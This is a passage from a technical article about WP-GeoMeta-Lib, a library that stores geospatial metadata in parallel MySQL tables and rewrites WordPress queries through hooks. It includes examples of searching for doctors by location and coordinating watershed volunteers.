Discussions at WordPress about supporting other databases serve mostly to show how daunting a port to PostgreSQL would be. Although MySQL and PostgreSQL both adhere to some standards, they differ in significant ways (for instance, in how they implement the essential feature of automatically incrementing columns). A PostgreSQL plugin for WordPress was created, but it never worked well and is now outdated to the point of being unusable. So WordPress administrators don't really have the option of using PostgreSQL or PostGIS.

Moore mentioned one example of the problems with MySQL: up through version 5.5, it determined whether geometric objects overlapped by checking each one's bounding box (the smallest rectangle that can contain the object). For instance, two circular objects that are close together may be considered overlapping even if just their bounding boxes overlap. This is inadequate for geolocation, which requires more precise processing. MySQL improved the code for version 5.6, but the majority of sites still run version 5.5 or earlier.

Moore also lamented the lack of Python support in WordPress, because Python offers so many powerful geolocation tools. WordPress is based on PHP, which I believe is another reason for its popularity. PHP doesn't offer geolocation support, but it doesn't seem to get in the way of what LuminFire wants to do.

A final requirement for LuminFire's development effort concerned its users: few of them are GIS experts who can understand the software popular in the GIS community. LuminFire wanted a tool that ordinary WordPress administrators could use. Given these limitations, LuminFire chose to develop a library for WordPress instead of a plugin. This WP-GeoMeta-Lib library, distributed under GPLv2, uses the WordPress API.

Working with a system that doesn't understand your data

In an email exchange after the conference, Moore gave me an in-depth explanation of the techniques used by WP-GeoMeta-Lib to turn the limited support by WordPress and MySQL into a platform for efficient and accurate location data. Here, we provide some background for people who want to understand WordPress's system of hooks and storage; it may also be of general interest because it illuminates how developers can deal with the tradeoffs posed by the platforms they work with.

At the center of WP-GeoMeta-Lib is a set of tables in the MySQL database that parallel the four WordPress tables holding metadata. WP-GeoMeta-Lib creates the parallel tables to store geospatial data. Instead of the MySQL data type used by WordPress for its metadata (LONGTEXT), WordPress uses the GEOMETRYCOLLECTION data type, the most appropriate type in MySQL to store geospatial information. To carry out basic geographical inquiries, such as whether a location is within a larger region or what the distance is between two locations, you need subclasses of MySQL's GEOMETRY type. Using LONGTEXT for that purpose would be like to trying to perform calculus using Roman numerals. GEOMETRYCOLLECTION is a good general-purpose type that recognizes points, lines, boundaries, and other concepts that are basic to geography. The generality of GEOMETRYCOLLECTION makes it useful for storing the arbitrary mix of geometric elements that different applications require.

WP-GeoMeta-Lib uses the WordPress hook system to intercept calls to the WordPress API and substitute a geospatial database for the WordPress metadata tables. Let's say a developer retrieves data from the MySQL database using the WP_Query object. (In theory, the developer could bypass WordPress and run raw SQL, but WordPress discourages this.) The function that handles WP_Query calls an internal WordPress function named get_meta_sql() on every query, so WP-GeoMeta-Lib registers its hook for that function. Every time get_meta_sql() runs on that WordPress site, it calls all the functions that the site developer passes to the hook. When the developer's functions finish, the function behind WP_Query picks up and continues as if nothing had intervened.

WP-GeoMeta-Lib uses hooks into the four types of metadata—posts, users, terms, and comments—that are part of the filters in the Plugin API. Plugins can add metadata to WordPress, delete metadata, update it, and retrieve it. By hooking into these low-level functions, WP-GeoMeta-Lib is guaranteed to have a whack at anything that affects WordPress metadata. And this metadata is where it's most convenient for the user to store structured data, such as geolocation data, in WordPress, so WP-GeoMeta-Lib works in a way familiar to WordPress developers.

The WP-GeoMeta-Lib hooks check the WordPress call for references to the more than a hundred spatial functions supported by MySQL. If it finds a spatial function, WP-GeoMeta-Lib changes the SQL to find the data of interest in its own geospatial metadata instead of the general-purpose WordPress metadata. The library also alters that fragment of SQL to run the requested spatial function. After updating the SQL query, the library returns from the hook so WordPress can do its usual stuff with all the elements of the API call.

Thus, WordPress doesn't have to know what WP-GeoMeta-Lib is doing. WordPress goes ahead and stores its own version of the geospatial element in the LONGTEXT fields. It would be hard to tell WordPress to alter its usual behavior, so WP-GeoMeta-Lib does not try to suppress the LONGTEXT elements. It just ensures that its own metadata is used for geospatial elements—the LONGTEXT metadata is basically inert.

Part of Moore's design for WP-GeoMeta-Lib is based on a humble assumption that something might go wrong during its run, and he wanted to minimize the chance that it would interfere with the function that calls it, or other functions that website developers might pass to hooks. Therefore, he chose to hook in his functions at the latest possible point.

Moore used WP-GeoMeta-Lib to develop plugins that are even easier to use than API calls for certain tasks. Two of these, Brilliant Geocoder for Gravity Forms and GeoMeta for ACF, allow WordPress sites to use popular form plugins to give end-users tools for viewing and manipulating geospatial data. They also help administrators put WP-GeoMeta-Lib to direct use, as we'll see.

Example use: searching by location

A LuminFire client in the medical services industry uses WP-GeoMeta-Lib to enable customers to search for doctors by location. Information about these doctors is stored in a directory exposed through WordPress's custom post type, which allows the developer to create new fields that WordPress hasn't provided. This particular client made the doctor's name the title of each custom post, and created a collection of custom fields to store information that patients might use to search for doctors, such as their specialties and qualifications.

Because the client used ACF Pro to store each field, the developers used the GeoMeta for ACF plugin to create a field for the doctor's location. When the medical site's staff edit listings of doctors and add or update an address, the GeoMeta for ACF plugin geocodes the address to get the coordinates of the office location. The coordinates are returned in GeoJSON format. When all the doctor information is saved by the generic ACF plugin, the GeoMeta for ACF plugin invokes WP-GeoMeta-Lib to store the coordinates in the WP-GeoMeta-lib metadata tables.

Customers can then log into the site and view the doctor directory, which allows searches using various criteria (called a faceted search by ontologists), including the customer's address and a maximum distance. A search using these facets triggers a function that geocodes the address and runs a spatial query against the WP-GeoMeta-lib metadata. The results are passed back to WordPress and the directory is redisplayed with only the doctors located within the maximum distance.

The resulting code is both robust and extendable. The medical company plans to add more complex searches, such as finding doctors who restrict their practices to certain regions or counties. Although the most basic distance-based search could have been carried out using custom queries and trigonometry, the more irregular searches will need the full, sophisticated spatial query capabilities.

Example use: connecting users by geographic location

A non-profit uses WP-GeoMeta-Lib as part of coordinating waterway stewardship among cities, watershed management organizations (WMOs), Watershed Districts (WDs), and volunteers. Pollution in one area of a watershed affects all downstream areas, so the WMOs and WDs are responsible for regulating and managing pollution across multiple city and county borders. This client runs several types of spatial queries, and stores location information in several places.

For instance, pollution mitigation features (such as a rain garden) are usually group projects. The volunteer who launches the initiative wants to search for other volunteers who live close by. And after the project is complete, both the city and the relevant WMO want to know about it.

When volunteers sign up, they enter their information through a form powered by the Gravity Forms plugin. Hence Moore's Brilliant Geocoder for Gravity Forms plugin, which the non-profit use to convert the volunteer's address into a location. As with the previous example, data about the projects is stored on a custom post type, and the function that stores the data uses GeoMeta for ACF to let volunteers and site editors enter project locations.

Finally, the site created a custom category collection for projects so that a project can be tagged with a WMO or WD. Each of the tags for a WMO or WD includes its boundaries as geospatial information. This could be used in the future for applications such as finding a WD that would benefit from a project, finding all volunteers living within the boundaries of an WMO's region, or checking which regions benefit from funding. In short, this data will enable spatial-based reporting and mapping, giving the non-profit the opportunity to add powerful geospatial enhancements to their site over time.

Although mapping is a big part of GIS, Moore pointed out that neither of the cases mentioned in this article use mapping currently. A lot of searching and reporting is also location-based and is difficult or impossible without spatial data.

Conclusion

WP-GeoMeta-Lib uses a lot of workarounds. It is clever in its use of parallel metadata, but it requires developers to build new geolocation tools on top of MySQL, somewhat reinventing the wheel when other environments use PostGIS or proprietary tools. The example uses highlighted in this article show the potential for GIS tools in a web environment; hopefully this potential will draw more developers to create them.

The basic assumptions behind WordPress would probably make it hard for WordPress to upgrade to more native support for GIS. For instance, it would have to allow arbitrary objects as metadata instead of plain text. Moore's goal of bringing geographical information to a wide audience of administrators and users is a commendable one, and WP-GeoMeta-Lib seems to have accomplished a lot toward that goal.

Comments (10 posted)